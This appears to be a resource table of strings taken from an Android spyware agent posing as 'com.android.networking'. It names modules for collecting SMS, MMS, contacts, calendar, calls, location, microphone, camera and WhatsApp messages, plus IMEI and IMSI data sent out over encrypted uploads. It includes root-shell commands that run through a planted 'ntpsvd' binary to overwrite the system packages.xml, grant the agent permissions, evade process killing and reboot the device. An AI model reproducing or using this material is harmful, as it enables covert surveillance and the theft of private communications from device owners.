S_1=uninstall
S_10=disable
S_11=synchronize
S_12=apn
S_13=execute
S_14=log
S_15=stop
S_2=sms
S_3=module
S_4=status
S_5=start
S_6=stop
S_7=event
S_8=status
S_9=enable
M_1=content://mms-sms
M_10=text
M_11=content://mms/part/
M_12=UTF-8
M_13=msg_id
M_14=content://mms/{0}/addr
M_15=address
M_5=content://mms/part
M_7=ct
M_8=text/plain
M_9=_data
1_0=IMSI: 
1_1=SID: 
1_11=IMSI: 
1_13=Sms type: 
1_14= number: 
1_15= text: 
1_2=, NID: 
1_3=, BID: 
1_4=CC: 
1_5=, MNC: 
1_6=, LAC: 
1_7=, CID: 
1_8=Cell and GPS info not available
1_9=IMEI: 
2_0=package:com.android.networking
3_0=User-Agent
3_1=Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522+ (KHTML, like Gecko) Safari/419.3
3_2=Content-Type
3_3=application/octet-stream
4_10=application/octet-stream
4_2=/wc12/webclient
4_3=content-type
4_4=set-cookie
4_5=content-length
4_6=application/octet-stream
4_7=User-Agent
4_8=Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522+ (KHTML, like Gecko) Safari/419.3
4_9=Content-Type
5_0=core-update
5_1=New configuration received
5_2=application/vnd.android.package-archive
6_0=<html>
6_1=SHA1PRNG
7_0=u
7_1=no notes
8_0=Crisis started
8_2=Crisis stopped
9_11=cpuTotal: 
9_13=cpuIdle: 
9_15=root: yes
9_16=root: no
9_17=-- PROPERTIES --
9_21=/proc/stat
9_22=Board: 
9_23=Brand: 
9_24=Device: 
9_25=Display: 
9_26=Model:
9_3=-- SYSTEM --
9_4=IMEI: 
9_6=IMSI: SIM not present
9_7=IMSI: 
9_9=cpuUsage: 
10_1=MMS Subject: 
10_2=local
10_4=Body: 
11_1=Desktop
11_2=/system/bin/ntpsvd fb
11_3=frame
12_0=LocationThread
13_0=content://mms/sent
13_1=content://mms/inbox
13_10=_id
13_11=content://mms
13_12=addr
13_13=insert-address-token
13_17=thread_id
13_2=address
13_3=contact_id
13_4=charset
13_5=type
13_6=137
13_8=sub
13_9=date
14_0=content://sms/inbox
14_1=content://sms/sent
14_10=status
14_11=type
14_12=reply_path_present
14_13=service_center
14_2=body
14_3=address
14_4=date
14_5=yields_id
14_6=thread_id
14_7=person
14_8=protocol
14_9=read
15_1=pdus
15_2=SMS from 
16_0=User Id: 
16_1=Complete Name: 
16_11=State: 
16_12=Country: 
16_13=City: 
16_14=Street: 
16_15=PO Box: 
16_16=Zip: 
16_17=Neighbor: 
16_18=Address Type: 
16_2=Nickname: 
16_20=IM: 
16_21=IM Type: 
16_23=Company Name: 
16_24=Company Title: 
16_25=Company Type: 
16_27=Website: 
16_3=UserNote: 
16_5=Phone: 
16_6=Phone Type: 
16_8=Email: 
16_9=Type: 
17_0=AES
17_1=AES/CBC/NoPadding
17_2=AES/CBC/PKCS5Padding
17_3=AES/CBC/PKCS5Padding
17_4=AES/CBC/PKCS5Padding
18_1=mail
18_2=enabled
18_3=filter
18_4=history
18_5=datefrom
18_6=dateto
18_7=sms
18_8=enabled
18_9=mms
19_0=SHA-1
20_0=9774d56d682e549c
20_1=DEMO
21_0=SHA-1
22_0=.mob
22_1=Z
22_2=Z*
22_3=pr_80
22_4=.dat
22_5=l_
22_6=0000
23_0=$DIR$
23_1=%USERPROFILE%
23_2=%USERDOC%
23_3=%USERPICTURES%
24_0=cdd/
24_1=msdd/
24_2=ldd/
24_5=/.LOST.FILES/
25_0=content://sms
26_0=pdus
27_0=com.android.networking.app
28_0= incoming: 
28_1= ongoing: 
29_0=MCC: 
29_1= MNC: 
29_2= LAC: 
29_3= CID: 
29_4=SID: 
29_5= NID: 
29_6= BID: 
30_1=Started
30_2=Invalid new configuration, reverting
30_3=New configuration activated
30_4=Actual configuration corrupted
31_0=sdk
31_1=UNAVAILABLE
31_10=cdma or not?
31_11= info: 
31_4=N/A
31_6= Error: 
31_7=null cell
31_8=gprs or not?
31_9= info: 
32_0=None
32_1=Agent Created
32_10= vol
32_11= rt
32_12=Root exploit
32_13=exploit failed!
32_14= air
32_15=layout
32_16=android.permission.READ_SMS
32_17=com.android.networking
32_18=/system/bin/ntpsvd fhc /data/system/packages.xml /data/data/com.android.networking/files/packages.xml
32_19=/system/bin/ntpsvd pzm 666 /data/data/com.android.networking/files/packages.xml
32_2=/system/bin/ntpsvd
32_20=/data/data/com.android.networking/files/test
32_21=packages.xml
32_22=/data/data/com.android.networking/files/packages.xml
32_23=perm.xml
32_24=/system/bin/ntpsvd qzx \"cat /data/data/com.android.networking/files/layout > 
32_25=/system/bin/ntpsvd qzx \"cat /data/data/com.android.networking/files/perm.xml > /data/system/packages.xml\"
32_26=/data/data/com.android.networking/files/perm.xml
32_27=/data/data/com.android.networking/files/layout
32_28=/system/bin/ntpsvd reb
32_29=/data/data/com.android.networking/files/statusdb rt
32_3=Agent Destroyed
32_30=su
32_31=su -c /data/data/com.android.networking/files/s
32_32=/system/bin/ntpsvd ru
32_33=/data/data/com.android.networking/files/s
32_34=#!/system/bin/sh
32_35=/system/bin/ntpsvd qzx \"echo '-1000' > /proc/
32_36=/oom_score_adj\"
32_37=/system/bin/ntpsvd qzx \"echo '-17' > /proc/
32_38=/oom_adj\"
32_39=/system/app/Superuser.apk
32_40=/data/app/com.noshufou.android.su-1.apk
32_4=errorlog
32_5=statuslog
32_6=statusdb
32_7=/system/bin/chmod 755 
32_8=/system/bin/chmod 755 
32_9=/system/bin/chmod 666 
33_0=getInt
33_1=getLong
33_2=getBoolean
33_3=set
33_4=/system/app/Settings.apk
34_0=UnicodeLittleUnmarked
35_0=qzx
35_1=/system/bin/sh
36_0=0xA83E0F44BD7A4D20
36_1=0x5A3D10448D7A912B
36_2=0x5A3D10448D7A912A
36_3=(onConfigurationChanged)
36_4=(onLowMemory)
36_5=(onRebind)
36_6=(onUnbind)
36_7=/
36_8=cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq
a_0=/system/bin/ntpsvd
a_1=quota
a_10=actions
a_11=globals
a_12=type
a_13=desc
a_14=subactions
a_15=action
a_16=type
a_17=event
a_18=module
a_2=min
a_3=max
a_4=wipe
a_5=type
a_6=migrated
a_7=version
a_8=modules
a_9=events
b_0=sms
b_1=addressbook
b_10=mic
b_11=camera
b_12=clipboard
b_13=crisis
b_14=application
b_2=calendar
b_3=calllist
b_4=call
b_5=device
b_6=position
b_7=snapshot
b_8=screenshot
b_9=messages
c_0=sms
c_1=addressbook
c_10=clipboard
c_11=crisis
c_12=application
c_13=call
c_14=chat
c_2=calendar
c_3=calllist
c_4=device
c_5=position
c_6=screenshot
c_7=messages
c_8=mic
c_9=camera
d_0=RULE: 
d_10=dtend
d_11=rrule
d_12=allDay
d_13=eventLocation
d_14=description
d_15=calendar_id
d_16=_id ASC
d_17=/events
d_18=content://calendar
d_19=content://com.android.calendar
d_2=/calendars
d_3=_id
d_4=displayName
d_5=selected
d_6=ownerAccount
d_7=_id
d_8=title
d_9=dtstart
e_0=timer
e_1=loop
e_10=quota
e_11=sim
e_12=position gps
e_13=ac
e_14=battery
e_15=standby
e_2=startup
e_3=date
e_4=afterinst
e_5=sms
e_6=call
e_7=connection
e_8=process
e_9=position cell
f_0=/data/data/com.whatsapp/databases
f_1=/msgstore.db
f_2=/system/bin/ntpsvd pzm 777 
f_3=chat_list
f_4=_id
f_5=key_remote_jid
f_6=message_table_id
f_7=data
f_8=WhatsApp
f_9=@s.whatsapp.net
f_a=messages
g_1=LT18i 
g_2=GT-I9300
g_3=GT-I9100
g_4=Galaxy Nexus
g_5=HTC Vision